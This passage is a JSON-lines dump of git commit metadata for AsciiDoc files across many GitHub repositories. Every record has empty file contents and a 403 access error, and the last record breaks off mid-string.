{"commit":"8d9ebe80a5ecb97e19d20706397bd7aeb3212d5f","subject":"Update 2017-3-31-scrapy.adoc","message":"Update 2017-3-31-scrapy.adoc","repos":"chaseey\/chaseey.github.io,chaseey\/chaseey.github.io,chaseey\/chaseey.github.io,chaseey\/chaseey.github.io","old_file":"_posts\/2017-3-31-scrapy.adoc","new_file":"_posts\/2017-3-31-scrapy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chaseey\/chaseey.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0c80011080e29a36fe19576f670270496c872f11","subject":"--wip-- [skip ci]","message":"--wip-- [skip ci]\n","repos":"moccalotto\/kaos,moccalotto\/kaos","old_file":"_brainstorms\/showdown.asciidoc","new_file":"_brainstorms\/showdown.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/moccalotto\/kaos.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ae7c2a331f0b7316d89721c0c7a6c28d243f362d","subject":"Update 2016-04-30-Example.adoc","message":"Update 2016-04-30-Example.adoc","repos":"kay\/kay.github.io,kay\/kay.github.io,kay\/kay.github.io,kay\/kay.github.io","old_file":"_posts\/2016-04-30-Example.adoc","new_file":"_posts\/2016-04-30-Example.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kay\/kay.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1cc225532449aa0f250443bb4821b9804f30b0c5","subject":"Update 2018-07-26-Scratch.adoc","message":"Update 2018-07-26-Scratch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-26-Scratch.adoc","new_file":"_posts\/2018-07-26-Scratch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"20fd91a4301a68e1bffe13140bed9c260d60db90","subject":"Update 1993-11-17.adoc","message":"Update 
1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/1993-11-17.adoc","new_file":"_posts\/1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d36932fb08b3d754c018a22208adca06754849fb","subject":"Update 2017-02-01-Hello.adoc","message":"Update 2017-02-01-Hello.adoc","repos":"introspectively\/introspectively.github.io,introspectively\/introspectively.github.io,introspectively\/introspectively.github.io,introspectively\/introspectively.github.io","old_file":"_posts\/2017-02-01-Hello.adoc","new_file":"_posts\/2017-02-01-Hello.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/introspectively\/introspectively.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3a180f130e922c5e2c29f1bd645b88b19b083b78","subject":"Update 2017-07-28-mecab.adoc","message":"Update 2017-07-28-mecab.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-28-mecab.adoc","new_file":"_posts\/2017-07-28-mecab.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5d4da9874565772968c41342d828aeac91b099ab","subject":"#420 initial version of Quick Guide","message":"#420 initial version of Quick Guide\n","repos":"remkop\/picocli,remkop\/picocli,remkop\/picocli,remkop\/picocli","old_file":"docs\/quick-guide.adoc","new_file":"docs\/quick-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/remkop\/picocli.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"366257ce6696daabbd6368bccc4a948ad5368165","subject":"Delete the file at '_posts\/2017-09-24-Backdoor-CTF-2017.adoc'","message":"Delete the file at '_posts\/2017-09-24-Backdoor-CTF-2017.adoc'","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-09-24-Backdoor-CTF-2017.adoc","new_file":"_posts\/2017-09-24-Backdoor-CTF-2017.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"299ddc6fd1b9384c35b66be8cb9c062c275ae413","subject":"Update 2015-09-28-A-Byte-of-Python.adoc","message":"Update 2015-09-28-A-Byte-of-Python.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-28-A-Byte-of-Python.adoc","new_file":"_posts\/2015-09-28-A-Byte-of-Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0c058502f40b11d5266c2f5ce4509ef23cf3a0e0","subject":"Update 2016-01-23-Giving-up-XQuery.adoc","message":"Update 
2016-01-23-Giving-up-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Giving-up-XQuery.adoc","new_file":"_posts\/2016-01-23-Giving-up-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"94b1d6fe9ecc222580d404314799fb8b87a90c9e","subject":"Create technoedge.adoc","message":"Create technoedge.adoc","repos":"oreillyross\/developer-notes,oreillyross\/developer-notes,oreillyross\/developer-notes","old_file":"technoedge.adoc","new_file":"technoedge.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oreillyross\/developer-notes.git\/': The requested URL returned error: 403\n","license":"artistic-2.0","lang":"AsciiDoc"} {"commit":"36bff3d7212c079d4699ec584abc7bdb9d3c98d7","subject":"CAMEL-12665 - Added autogenerated docs","message":"CAMEL-12665 - Added autogenerated docs\n","repos":"adessaigne\/camel,CodeSmell\/camel,CodeSmell\/camel,ullgren\/camel,pmoerenhout\/camel,gnodet\/camel,zregvart\/camel,pmoerenhout\/camel,zregvart\/camel,tadayosi\/camel,pax95\/camel,cunningt\/camel,tadayosi\/camel,tadayosi\/camel,DariusX\/camel,adessaigne\/camel,adessaigne\/camel,davidkarlsen\/camel,DariusX\/camel,davidkarlsen\/camel,ullgren\/camel,mcollovati\/camel,mcollovati\/camel,DariusX\/camel,nicolaferraro\/camel,gnodet\/camel,christophd\/camel,christophd\/camel,christophd\/camel,ullgren\/camel,cunningt\/camel,alvinkwekel\/camel,tdiesler\/camel,tdiesler\/camel,davidkarlsen\/camel,mcollovati\/camel,zregvart\/camel,tdiesler\/camel,adessaigne\/camel,Fabryprog\/camel,pax95\/camel,objectiser\/camel,christophd\/camel,nicolaferraro\/camel,christophd\/camel,nikhilvibhav\/camel,zregvart\/camel,apache\/camel,tadayosi\/camel,alvinkwekel\/camel,tadayosi\/camel,cunningt\/camel,tdiesler\/camel,alvinkwekel\/camel,CodeSmell\/camel,cunningt\/camel,nicolaferraro\/camel,adessaigne\/camel,mcollovati\/camel,nikhilvibhav\/camel,apache\/camel,gnodet\/camel,tadayosi\/camel,pmoerenhout\/camel,adessaigne\/camel,cunningt\/camel,cunningt\/camel,objectiser\/camel,ullgren\/camel,DariusX\/camel,pmoerenhout\/camel,Fabryprog\/camel,pmoerenhout\/camel,nicolaferraro\/camel,objectiser\/camel,objectiser\/camel,apache\/camel,pmoerenhout\/camel,apache\/camel,christophd\/camel,nikhilvibhav\/camel,alvinkwekel\/camel,pax95\/camel,tdiesler\/camel,pax95\/camel,gnodet\/camel,gnodet\/camel,davidkarlsen\/camel,Fabryprog\/camel,tdiesler\/camel,Fabryprog\/camel,pax95\/camel,pax95\/camel,nikhilvibhav\/camel,apache\/camel,apache\/camel,CodeSmell\/camel","old_file":"components\/camel-pulsar\/src\/main\/docs\/pulsar-component.adoc","new_file":"components\/camel-pulsar\/src\/main\/docs\/pulsar-component.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b21f7f3d05a618531d014faffcaca20bf6633136","subject":"update programme","message":"update programme\n","repos":"feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org","old_file":"_posts\/2017-09-01-fud5-day4.adoc","new_file":"_posts\/2017-09-01-fud5-day4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: 
unable to access 'https:\/\/github.com\/feelpp\/www.feelpp.org.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0fb6f400e18bcac191884b2b8f239d5fad4b4c46","subject":"Update 2016-06-01-Testing-chef-changes-the-dirty-way.adoc","message":"Update 2016-06-01-Testing-chef-changes-the-dirty-way.adoc","repos":"InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io","old_file":"_posts\/2016-06-01-Testing-chef-changes-the-dirty-way.adoc","new_file":"_posts\/2016-06-01-Testing-chef-changes-the-dirty-way.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InformatiQ\/informatiq.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1ec95ec8d85872ad830a1a64e34303702f6f0c0c","subject":"Update 2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","message":"Update 2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","repos":"neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io","old_file":"_posts\/2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","new_file":"_posts\/2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neocarvajal\/neocarvajal.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bb4af33f9655e01bb2a7faa0c0fcfaa345330005","subject":"Update 2015-07-14-How-To-Delete-Old-Category-Labels-from-Google-Groups.adoc","message":"Update 2015-07-14-How-To-Delete-Old-Category-Labels-from-Google-Groups.adoc","repos":"jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog","old_file":"_posts\/2015-07-14-How-To-Delete-Old-Category-Labels-from-Google-Groups.adoc","new_file":"_posts\/2015-07-14-How-To-Delete-Old-Category-Labels-from-Google-Groups.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaredmorgs\/jaredmorgs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"65eb59a2df86d27270bfcf6fdfc7996e7f78f69f","subject":"Dymmy root commit","message":"Dymmy root commit\n","repos":"tmikov\/linebench,tmikov\/linebench,tmikov\/linebench,tmikov\/linebench,tmikov\/linebench","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tmikov\/linebench.git\/': The requested URL returned error: 403\n","license":"unlicense","lang":"AsciiDoc"} {"commit":"6fb4a7433cefd53e34aee10afa562952d6ecf2e0","subject":"Update 2014-12-04-Ships-Maps-Dev-Diary.adoc","message":"Update 2014-12-04-Ships-Maps-Dev-Diary.adoc","repos":"Sth0nian\/hubpress.io,Sth0nian\/hubpress.io,Sth0nian\/hubpress.io","old_file":"_posts\/2014-12-04-Ships-Maps-Dev-Diary.adoc","new_file":"_posts\/2014-12-04-Ships-Maps-Dev-Diary.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: 
unable to access 'https:\/\/github.com\/Sth0nian\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a207120b324723a94bd1d2c7f23124a423155e7b","subject":"Update 2017-07-21-Learning-to-reconstruct.adoc","message":"Update 2017-07-21-Learning-to-reconstruct.adoc","repos":"adler-j\/adler-j.github.io,adler-j\/adler-j.github.io","old_file":"_posts\/2017-07-21-Learning-to-reconstruct.adoc","new_file":"_posts\/2017-07-21-Learning-to-reconstruct.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adler-j\/adler-j.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5eec54eac4c8faec5c39117c32853c4e080fbfba","subject":"Update 2018-05-02-Azure-11.adoc","message":"Update 2018-05-02-Azure-11.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-02-Azure-11.adoc","new_file":"_posts\/2018-05-02-Azure-11.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e2f2405988785856ff973aa0989a9b778820b9f5","subject":"Renamed '_posts\/2017-11-06-Using-ediff-with-Visual-Studio-Team-Foundation-Server.adoc' to '_posts\/2017-11-03-Using-ediff-with-Visual-Studio-Team-Foundation-Server.adoc'","message":"Renamed '_posts\/2017-11-06-Using-ediff-with-Visual-Studio-Team-Foundation-Server.adoc' to '_posts\/2017-11-03-Using-ediff-with-Visual-Studio-Team-Foundation-Server.adoc'","repos":"sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io","old_file":"_posts\/2017-11-03-Using-ediff-with-Visual-Studio-Team-Foundation-Server.adoc","new_file":"_posts\/2017-11-03-Using-ediff-with-Visual-Studio-Team-Foundation-Server.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sebasmonia\/sebasmonia.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7141c1ffa594e8d28fcc1970e118b846088efa4f","subject":"Add documentation about which functions are usually executed in forked child","message":"Add documentation about which functions are usually executed in forked child\n","repos":"thoni56\/cgreen,thoni56\/cgreen,cgreen-devs\/cgreen,thoni56\/cgreen,cgreen-devs\/cgreen,thoni56\/cgreen,cgreen-devs\/cgreen,cgreen-devs\/cgreen,thoni56\/cgreen,cgreen-devs\/cgreen","old_file":"doc\/cgreen-guide-en.asciidoc","new_file":"doc\/cgreen-guide-en.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thoni56\/cgreen.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"af3bcdb82137eb44d7a99b31bf75a3c4d897b87b","subject":"Initial commit","message":"Initial commit\n","repos":"dadoonet\/elasticsearch-parent,rmuir\/elasticsearch-parent,elastic\/elasticsearch-parent","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rmuir\/elasticsearch-parent.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} 
{"commit":"8553d57716232ef79405abd4869b7c5003285e0b","subject":"Added documentation regarding using the prebuilt Docker image","message":"Added documentation regarding using the prebuilt Docker image\n","repos":"Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb","old_file":"docs\/XSLWeb Developer Manual.adoc","new_file":"docs\/XSLWeb Developer Manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Armatiek\/xslweb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"27124ddd1d2190572275c3a52af1774b59892c34","subject":"Create symbolic link for asciidoc index (#1841)","message":"Create symbolic link for asciidoc index (#1841)\n\n","repos":"GoogleCloudPlatform\/spring-cloud-gcp,spring-cloud\/spring-cloud-gcp,spring-cloud\/spring-cloud-gcp,spring-cloud\/spring-cloud-gcp,spring-cloud\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp","old_file":"docs\/src\/main\/asciidoc\/index.adoc","new_file":"docs\/src\/main\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-cloud\/spring-cloud-gcp.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f711377598081f2d039f4c51d994a9f26c3f976a","subject":"Update 2015-10-10-Jug-Summer-Camp-2015.adoc","message":"Update 2015-10-10-Jug-Summer-Camp-2015.adoc","repos":"binout\/javaonemorething,binout\/javaonemorething,binout\/javaonemorething,binout\/javaonemorething","old_file":"_posts\/2015-10-10-Jug-Summer-Camp-2015.adoc","new_file":"_posts\/2015-10-10-Jug-Summer-Camp-2015.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/binout\/javaonemorething.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e1cbb7ad4c33c3d2aa3f5f6ab8a6c1f6c8fd7ec1","subject":"Update 2016-04-04-Chairpersons-Chinwag.adoc","message":"Update 2016-04-04-Chairpersons-Chinwag.adoc","repos":"Perthmastersswimming\/hubpress.io,Perthmastersswimming\/hubpress.io,Perthmastersswimming\/hubpress.io,Perthmastersswimming\/hubpress.io","old_file":"_posts\/2016-04-04-Chairpersons-Chinwag.adoc","new_file":"_posts\/2016-04-04-Chairpersons-Chinwag.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Perthmastersswimming\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a8e6f93ab2606426bce9fa492e4af5b71815d1ba","subject":"Update 2016-05-13-Engineer-Career-Path.adoc","message":"Update 2016-05-13-Engineer-Career-Path.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-05-13-Engineer-Career-Path.adoc","new_file":"_posts\/2016-05-13-Engineer-Career-Path.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"22ff4042a022d56911dafb77bcba761221170cc0","subject":"formatting","message":"formatting\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"week02.asciidoc","new_file":"week02.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"295c6c77d781a71082e7afe320187da982e5751e","subject":"Update 2015-11-03-WildFlyJBoss-vs-Tomcat.adoc","message":"Update 2015-11-03-WildFlyJBoss-vs-Tomcat.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-11-03-WildFlyJBoss-vs-Tomcat.adoc","new_file":"_posts\/2015-11-03-WildFlyJBoss-vs-Tomcat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4bcc2fbd598ab46e9673214433b8723e4a1cb663","subject":"Update 2017-02-14-Osram-Lightify-Gateway.adoc","message":"Update 2017-02-14-Osram-Lightify-Gateway.adoc","repos":"datumrich\/datumrich.github.io,datumrich\/datumrich.github.io,datumrich\/datumrich.github.io,datumrich\/datumrich.github.io","old_file":"_posts\/2017-02-14-Osram-Lightify-Gateway.adoc","new_file":"_posts\/2017-02-14-Osram-Lightify-Gateway.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/datumrich\/datumrich.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e6995444e614fe0fce3da1f824056bb9c7feb51c","subject":"Update 2017-10-12-start-chrome-extension.adoc","message":"Update 2017-10-12-start-chrome-extension.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-12-start-chrome-extension.adoc","new_file":"_posts\/2017-10-12-start-chrome-extension.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"74e10057f09c1b3893d7d37c2b4f8b4c765f73c4","subject":"Update README","message":"Update README\n","repos":"pjanouch\/autistdraw","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pjanouch\/autistdraw.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"c648a9eda302671913fc1f05cc68029a5b1d9ef6","subject":"Add `note grep` example to README.adoc","message":"Add `note grep` example to README.adoc\n","repos":"rumpelsepp\/pynote","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rumpelsepp\/pynote.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4edff1285505a7122460bc1f912cee169373fbdd","subject":"Update 2016-04-20-Nighttime-awakens-at-Disneys-Animal-Kingdom-this-summer.adoc","message":"Update 
2016-04-20-Nighttime-awakens-at-Disneys-Animal-Kingdom-this-summer.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-04-20-Nighttime-awakens-at-Disneys-Animal-Kingdom-this-summer.adoc","new_file":"_posts\/2016-04-20-Nighttime-awakens-at-Disneys-Animal-Kingdom-this-summer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e9810bf20c57a3e806347575e49ffa445a1a0b0d","subject":"last commit before referencing","message":"last commit before referencing\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"asciidoc\/week06.asciidoc","new_file":"asciidoc\/week06.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8ba3dffc8b78fadfa8523e7cb4a48981fea02d6e","subject":"y2b create post PICK YOUR PRIZE GIVEAWAY!","message":"y2b create post PICK YOUR PRIZE GIVEAWAY!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-08-16-PICK-YOUR-PRIZE-GIVEAWAY.adoc","new_file":"_posts\/2012-08-16-PICK-YOUR-PRIZE-GIVEAWAY.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"76eda1b3c444179a5d3094795100b3dc37085db1","subject":"Concept","message":"Concept\n","repos":"beavyHQ\/beavy,beavyHQ\/beavy,beavyHQ\/beavy,beavyHQ\/beavy","old_file":"docs\/Concept.adoc","new_file":"docs\/Concept.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/beavyHQ\/beavy.git\/': The requested URL returned error: 403\n","license":"mpl-2.0","lang":"AsciiDoc"} {"commit":"ede0edd2149dfb4bfee708439c9d331918f02981","subject":"Update 2017-09-08-OP-Installer-Merging.adoc","message":"Update 2017-09-08-OP-Installer-Merging.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2017-09-08-OP-Installer-Merging.adoc","new_file":"_posts\/2017-09-08-OP-Installer-Merging.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"df131dce5809e20f1aa28d7267e735e951cd5b0f","subject":":memo: cdn vue","message":":memo: cdn vue\n","repos":"syon\/refills","old_file":"src\/refills\/vuejs\/vue-cdn.adoc","new_file":"src\/refills\/vuejs\/vue-cdn.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/syon\/refills.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e31635a9a802adc248388704ce25e9abbb21b5c2","subject":"doc: update astf manual","message":"doc: update astf manual\n\nSigned-off-by: Hanoh Haim 
<1f34741bfa88280155d5053f5e8f4b89d8aa79bf@cisco.com>\n","repos":"dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core","old_file":"doc\/trex_astf.asciidoc","new_file":"doc\/trex_astf.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dimagol\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0e04ea1f71255ebb5c41d63bef69c8704b5e7bbb","subject":"Update 2012-11-09-google-cloud-endpoints.adoc","message":"Update 2012-11-09-google-cloud-endpoints.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2012-11-09-google-cloud-endpoints.adoc","new_file":"_posts\/2012-11-09-google-cloud-endpoints.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a7edc228f3ff7a9aa681a0ab01b0fa74948a159a","subject":"Update 2016-12-09-Azure-Machine-Learning.adoc","message":"Update 2016-12-09-Azure-Machine-Learning.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-09-Azure-Machine-Learning.adoc","new_file":"_posts\/2016-12-09-Azure-Machine-Learning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"685dcb7817968489acf32106ee75738486097869","subject":"Update 2011-01-12-Parser-des-parties-dechecs-avec-Scala-Parser-Combinators.adoc","message":"Update 2011-01-12-Parser-des-parties-dechecs-avec-Scala-Parser-Combinators.adoc","repos":"jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io","old_file":"_posts\/2011-01-12-Parser-des-parties-dechecs-avec-Scala-Parser-Combinators.adoc","new_file":"_posts\/2011-01-12-Parser-des-parties-dechecs-avec-Scala-Parser-Combinators.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jcsirot\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4a7be58b86835717d55f7f0d443b96e185ff7a0b","subject":"docs update","message":"docs 